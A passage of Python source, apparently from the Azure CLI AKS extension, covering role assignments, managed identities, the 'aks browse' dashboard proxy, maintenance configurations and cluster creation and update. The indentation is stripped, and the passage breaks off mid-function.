else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(
scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(
filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError(
"No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
_re_user_assigned_identity_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
flags=re.IGNORECASE)
def _get_user_assigned_identity(cli_ctx, resource_id):
resource_id = resource_id.lower()
match = _re_user_assigned_identity_resource_id.search(resource_id)
if match:
subscription_id = match.group(1)
resource_group_name = match.group(2)
identity_name = match.group(3)
msi_client = get_msi_client(cli_ctx, subscription_id)
try:
identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
resource_name=identity_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("Identity {} not found.".format(resource_id))
raise CLIError(ex.message)
return identity
raise CLIError(
"Cannot parse identity name from provided resource id {}.".format(resource_id))
def _get_user_assigned_identity_client_id(cli_ctx, resource_id):
return _get_user_assigned_identity(cli_ctx, resource_id).client_id
def _get_user_assigned_identity_object_id(cli_ctx, resource_id):
return _get_user_assigned_identity(cli_ctx, resource_id).principal_id
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def aks_browse(cmd, # pylint: disable=too-many-statements,too-many-branches
client,
resource_group_name,
name,
disable_browser=False,
listen_address='127.0.0.1',
listen_port='8001'):
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
# addon name is case insensitive
addon_profile = next((addon_profiles[k] for k in addon_profiles
if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
ManagedClusterAddonProfile(enabled=False))
# open portal view if addon is not enabled or k8s version >= 1.19.0
if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled):
subscription_id = get_subscription_id(cmd.cli_ctx)
dashboardURL = (
# Azure Portal URL (https://portal.azure.com for public cloud)
cmd.cli_ctx.cloud.endpoints.portal +
('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
'/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name)
)
if in_cloud_console():
logger.warning(
'To view the Kubernetes resources view, please open %s in a new tab', dashboardURL)
else:
logger.warning('Kubernetes resources view on %s', dashboardURL)
if not disable_browser:
webbrowser.open_new_tab(dashboardURL)
return
# otherwise open the kube-dashboard addon
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name,
name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post(
'http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning(
'To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
if err.output.find(b'unknown flag: --address'):
if listen_address != '127.0.0.1':
logger.warning(
'"--address" is only supported in kubectl v1.13 and later.')
logger.warning(
'The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig",
browse_path, "proxy", "--port", listen_port])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_MONITORING_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME], 'identity')) and
(hasattr(
result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
service_principal_msi_id = result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find service principal or user assigned MSI for role'
'assignment')
def _add_ingress_appgw_addon_role_assignment(result, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_INGRESS_APPGW_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME], 'identity')) and
(hasattr(
result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity, 'object_id'))
):
service_principal_msi_id = result.addon_profiles[
CONST_INGRESS_APPGW_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
config = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config
from msrestazure.tools import parse_resource_id, resource_id
if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in config:
appgw_id = config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
parsed_appgw_id = parse_resource_id(appgw_id)
appgw_group_id = resource_id(subscription=parsed_appgw_id["subscription"],
resource_group=parsed_appgw_id["resource_group"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=appgw_group_id):
logger.warning('Could not create a role assignment for application gateway: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', appgw_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_ID in config:
subnet_id = config[CONST_INGRESS_APPGW_SUBNET_ID]
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_msi_id, is_service_principal, scope=subnet_id):
logger.warning('Could not create a role assignment for subnet: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', subnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_CIDR in config:
if result.agent_pool_profiles[0].vnet_subnet_id is not None:
parsed_subnet_vnet_id = parse_resource_id(
result.agent_pool_profiles[0].vnet_subnet_id)
vnet_id = resource_id(subscription=parsed_subnet_vnet_id["subscription"],
resource_group=parsed_subnet_vnet_id["resource_group"],
namespace="Microsoft.Network",
type="virtualNetworks",
name=parsed_subnet_vnet_id["name"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual network: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', vnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
def aks_maintenanceconfiguration_list(
cmd,
client,
resource_group_name,
cluster_name
):
return client.list_by_managed_cluster(resource_group_name, cluster_name)
def aks_maintenanceconfiguration_show(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.get(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_delete(
cmd,
client,
resource_group_name,
cluster_name,
config_name
):
logger.warning('resource_group_name: %s, cluster_name: %s, config_name: %s ',
resource_group_name, cluster_name, config_name)
return client.delete(resource_group_name, cluster_name, config_name)
def aks_maintenanceconfiguration_add(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
for config in configs:
if config.name == config_name:
raise CLIError("Maintenance configuration '{}' already exists, please try a different name, "
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
def aks_maintenanceconfiguration_update(
cmd,
client,
resource_group_name,
cluster_name,
config_name,
config_file,
weekday,
start_hour
):
configs = client.list_by_managed_cluster(resource_group_name, cluster_name)
found = False
for config in configs:
if config.name == config_name:
found = True
break
if not found:
raise CLIError("Maintenance configuration '{}' doesn't exist."
"use 'aks maintenanceconfiguration list' to get current list of maitenance configurations".format(config_name))
return aks_maintenanceconfiguration_update_internal(cmd, client, resource_group_name, cluster_name, config_name, config_file, weekday, start_hour)
def aks_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
ssh_key_value,
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
enable_vmss=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
os_sku=None,
enable_fips_image=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
min_count=None,
max_count=None,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
node_zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
enable_pod_security_policy=False,
node_resource_group=None,
uptime_sla=False,
attach_acr=None,
enable_private_cluster=False,
private_dns_zone=None,
enable_managed_identity=True,
fqdn_subdomain=None,
api_server_authorized_ip_ranges=None,
aks_custom_headers=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_aad=False,
enable_azure_rbac=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
enable_sgxquotehelper=False,
kubelet_config=None,
linux_os_config=None,
assign_identity=None,
auto_upgrade_channel=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
enable_encryption_at_host=False,
enable_secret_rotation=False,
disable_local_accounts=False,
no_wait=False,
assign_kubelet_identity=None,
yes=False):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError(
'Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
subscription_id = get_subscription_id(cmd.cli_ctx)
if dns_name_prefix and fqdn_subdomain:
raise CLIError(
'--dns-name-prefix and --fqdn-subdomain cannot be used at same time')
if not dns_name_prefix and not fqdn_subdomain:
dns_name_prefix = _get_default_dns_prefix(
name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# Flag to be removed, kept for back-compatibility only. Remove the below section
# when we deprecate the enable-vmss flag
if enable_vmss:
if vm_set_type and vm_set_type.lower() != "VirtualMachineScaleSets".lower():
raise CLIError('enable-vmss and provided vm_set_type ({}) are conflicting with each other'.
format(vm_set_type))
vm_set_type = "VirtualMachineScaleSets"
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(
load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError(
'--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
# Must be 12 chars or less before ACS RP adds to it
name=_trim_nodepoolname(nodepool_name),
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
os_sku=os_sku,
mode="System",
vnet_subnet_id=vnet_subnet_id,
pod_subnet_id=pod_subnet_id,
proximity_placement_group_id=ppg,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
enable_fips=enable_fips_image,
node_public_ip_prefix_id=node_public_ip_prefix_id,
enable_encryption_at_host=enable_encryption_at_host,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool_profile.os_disk_type = node_osdisk_type
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
if kubelet_config:
agent_pool_profile.kubelet_config = _get_kubelet_config(kubelet_config)
if linux_os_config:
agent_pool_profile.linux_os_config = _get_linux_os_config(
linux_os_config)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(
admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username:
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(
msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError(
'Please specify both username and password in non-interactive mode.')
windows_license_type = None
if enable_ahub:
windows_license_type = 'Windows_Server'
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password,
license_type=windows_license_type)
service_principal_profile = None
principal_obj = None
# If customer explicitly provide a service principal, disable managed identity.
if service_principal and client_secret:
enable_managed_identity = False
if not enable_managed_identity:
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
fqdn_subdomain=fqdn_subdomain, location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"))
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
else:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
need_post_creation_vnet_permission_granting = False
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
# if service_principal_profile is None, then this cluster is an MSI cluster,
# and the service principal does not exist. Two cases:
# 1. For system assigned identity, we just tell user to grant the
# permission after the cluster is created to keep consistent with portal experience.
# 2. For user assigned identity, we can grant needed permission to
# user provided user assigned identity before creating managed cluster.
if service_principal_profile is None and not assign_identity:
msg = ('It is highly recommended to use USER assigned identity '
'(option --assign-identity) when you want to bring your own'
'subnet, which will have no latency for the role assignment to '
'take effect. When using SYSTEM assigned identity, '
'azure-cli will grant Network Contributor role to the '
'system assigned identity after the cluster is created, and '
'the role assignment will take some time to take effect, see '
'https://docs.microsoft.com/en-us/azure/aks/use-managed-identity, '
'proceed to create cluster with system assigned identity?')
from knack.prompting import prompt_y_n
if not yes and not prompt_y_n(msg, default="n"):
return None
need_post_creation_vnet_permission_granting = True
else:
scope = vnet_subnet_id
identity_client_id = ""
if assign_identity:
identity_client_id = _get_user_assigned_identity_client_id(
cmd.cli_ctx, assign_identity)
else:
identity_client_id = service_principal_profile.client_id
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
identity_client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
outbound_type = _set_outbound_type(
outbound_type, network_plugin, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin,
pod_cidr,
service_cidr,
dns_service_ip,
docker_bridge_address,
network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError(
'Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
if load_balancer_sku.lower() == "basic":
network_profile = ContainerServiceNetworkProfile(
load_balancer_sku=load_balancer_sku.lower(),
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id,
appgw_name,
appgw_subnet_prefix,
appgw_subnet_cidr,
appgw_id,
appgw_subnet_id,
appgw_watch_namespace,
enable_sgxquotehelper,
aci_subnet_name,
vnet_subnet_id,
enable_secret_rotation
)
monitoring = False
if CONST_MONITORING_ADDON_NAME in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(
cmd, addon_profiles[CONST_MONITORING_ADDON_NAME])
# addon is in the list and is enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles and \
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in addon_profiles:
enable_virtual_node = True
aad_profile = None
if enable_aad:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('"--enable-aad" cannot be used together with '
'"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
if disable_rbac and enable_azure_rbac:
raise CLIError(
'"--enable-azure-rbac" can not be used together with "--disable-rbac"')
aad_profile = ManagedClusterAADProfile(
managed=True,
enable_azure_rbac=enable_azure_rbac,
admin_group_object_ids=_parse_comma_separated_list(
aad_admin_group_object_ids),
tenant_id=aad_tenant_id
)
else:
if aad_admin_group_object_ids is not None:
raise CLIError(
'"--admin-aad-object-id" can only be used together with "--enable-aad"')
if enable_azure_rbac is True:
raise CLIError(
'"--enable-azure-rbac" can only be used together with "--enable-aad"')
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError(
'specify either "--disable-rbac" or "--enable-rbac", not both.')
api_server_access_profile = None
if api_server_authorized_ip_ranges:
api_server_access_profile = _populate_api_server_access_profile(
api_server_authorized_ip_ranges)
identity = None
if not enable_managed_identity and assign_identity:
raise CLIError(
'--assign-identity can only be specified when --enable-managed-identity is specified')
if enable_managed_identity and not assign_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif enable_managed_identity and assign_identity:
user_assigned_identity = {
assign_identity: ManagedClusterIdentityUserAssignedIdentitiesValue()
}
identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
identity_profile = None
if assign_kubelet_identity:
if not assign_identity:
raise CLIError('--assign-kubelet-identity can only be specified when --assign-identity is specified')
kubelet_identity = _get_user_assigned_identity(cmd.cli_ctx, assign_kubelet_identity)
identity_profile = {
'kubeletidentity': ManagedClusterPropertiesIdentityProfileValue(
resource_id=assign_kubelet_identity,
client_id=kubelet_identity.client_id,
object_id=kubelet_identity.principal_id
)
}
cluster_identity_object_id = _get_user_assigned_identity_object_id(cmd.cli_ctx, assign_identity)
# ensure the cluster identity has "Managed Identity Operator" role at the scope of kubelet identity
_ensure_cluster_identity_permission_on_kubelet_identity(cmd.cli_ctx, cluster_identity_object_id, assign_kubelet_identity)
pod_identity_profile = None
if enable_pod_identity:
if not enable_managed_identity:
raise CLIError(
'--enable-pod-identity can only be specified when --enable-managed-identity is specified')
pod_identity_profile = ManagedClusterPodIdentityProfile(enabled=True)
_ensure_pod_identity_kubenet_consent(
network_profile, pod_identity_profile, enable_pod_identity_with_kubenet)
enable_rbac = True
if disable_rbac:
enable_rbac = False
auto_upgrade_profile = None
if auto_upgrade_channel is not None:
auto_upgrade_profile = ManagedClusterAutoUpgradeProfile(
upgrade_channel=auto_upgrade_channel)
mc = ManagedCluster(
location=location, tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=enable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
auto_scaler_profile=cluster_autoscaler_profile,
enable_pod_security_policy=bool(enable_pod_security_policy),
identity=identity,
disk_encryption_set_id=node_osdisk_diskencryptionset_id,
api_server_access_profile=api_server_access_profile,
auto_upgrade_profile=auto_upgrade_profile,
pod_identity_profile=pod_identity_profile,
identity_profile=identity_profile,
disable_local_accounts=bool(disable_local_accounts))
if node_resource_group:
mc.node_resource_group = node_resource_group
use_custom_private_dns_zone = False
if enable_private_cluster:
if load_balancer_sku.lower() != "standard":
raise CLIError(
"Please use standard load balancer for private cluster")
mc.api_server_access_profile = ManagedClusterAPIServerAccessProfile(
enable_private_cluster=True
)
if private_dns_zone:
if not enable_private_cluster:
raise CLIError(
"Invalid private dns zone for public cluster. It should always be empty for public cluster")
mc.api_server_access_profile.private_dns_zone = private_dns_zone
from msrestazure.tools import is_valid_resource_id
if private_dns_zone.lower() != CONST_PRIVATE_DNS_ZONE_SYSTEM and private_dns_zone.lower() != CONST_PRIVATE_DNS_ZONE_NONE:
if is_valid_resource_id(private_dns_zone):
use_custom_private_dns_zone = True
else:
raise CLIError(private_dns_zone +
" is not a valid Azure resource ID.")
if fqdn_subdomain:
if not use_custom_private_dns_zone:
raise CLIError(
"--fqdn-subdomain should only be used for private cluster with custom private dns zone")
mc.fqdn_subdomain = fqdn_subdomain
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
headers = get_aks_custom_headers(aks_custom_headers)
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
created_cluster = _put_managed_cluster_ensuring_permission(
cmd,
client,
subscription_id,
resource_group_name,
name,
mc,
monitoring,
ingress_appgw_addon_enabled,
enable_virtual_node,
need_post_creation_vnet_permission_granting,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait)
return created_cluster
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
client,
resource_group_name,
name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None, no_wait=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
api_server_authorized_ip_ranges=None,
enable_pod_security_policy=False,
disable_pod_security_policy=False,
attach_acr=None,
detach_acr=None,
uptime_sla=False,
no_uptime_sla=False,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
aks_custom_headers=None,
auto_upgrade_channel=None,
enable_managed_identity=False,
assign_identity=None,
enable_pod_identity=False,
enable_pod_identity_with_kubenet=False,
disable_pod_identity=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
disable_local_accounts=False,
enable_local_accounts=False,
yes=False,
tags=None,
windows_admin_password=None,
enable_azure_rbac=False,
disable_azure_rbac=False):
update_autoscaler = enable_cluster_autoscaler or disable_cluster_autoscaler or update_cluster_autoscaler
update_acr = attach_acr is not None or detach_acr is not None
update_pod_security = enable_pod_security_policy or disable_pod_security_policy
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
update_aad_profile = not (
aad_tenant_id is None and aad_admin_group_object_ids is None and not enable_azure_rbac and not disable_azure_rbac)
# pylint: disable=too-many-boolean-expressions
if not update_autoscaler and \
cluster_autoscaler_profile is None and \
not update_acr and \
not update_lb_profile \
and api_server_authorized_ip_ranges is None and \
not update_pod_security and \
not update_lb_profile and \
not uptime_sla and \
not no_uptime_sla and \
not enable_aad and \
not update_aad_profile and \
not enable_ahub and \
not disable_ahub and \
not auto_upgrade_channel and \
not enable_managed_identity and \
not assign_identity and \
not enable_pod_identity and \
not disable_pod_identity and \
not enable_secret_rotation and \
not disable_secret_rotation and \
not tags and \
not windows_admin_password and \
not enable_local_accounts and \
